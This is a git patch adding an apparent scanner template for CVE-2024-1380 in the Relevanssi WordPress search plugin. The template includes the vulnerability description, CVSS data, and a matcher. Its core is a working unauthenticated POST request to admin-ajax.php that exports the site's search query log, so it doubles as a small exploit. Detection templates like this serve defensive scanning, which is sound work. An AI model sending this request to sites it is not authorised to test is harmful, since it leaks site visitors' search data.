From 0bba4427956b954e06b0fbdc8e2a902b1ed0f26f Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Thu, 1 Jan 1970 00:00:00 +0000 Subject: [PATCH] Added template for CVE-2024-1380 --- CVE-2024-1380.yaml | 36 ++++++++++++++++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 CVE-2024-1380.yaml diff --git a/CVE-2024-1380.yaml b/CVE-2024-1380.yaml new file mode 100644 index 0000000000..62848e8eb1 --- /dev/null +++ b/CVE-2024-1380.yaml @@ -0,0 +1,36 @@ +id: CVE-2024-1380 + +info: + name: Relevanssi - A Better Search <= 4.22.0 - Unauthenticated Query Log Export + author: FLX + severity: medium + description: | + The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1380 + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-1380 + epss-score: 0.00043 + epss-percentile: 0.0866 + tags: wordpress,relevanssi,cve,vulnerability,cve2024 + +http: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + body: "action=&relevanssi_export=1" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "Content-Disposition: attachment;filename=relevanssi_log.csv")' + - 'contains(header, "Content-Type: application/download")' \ No newline at end of file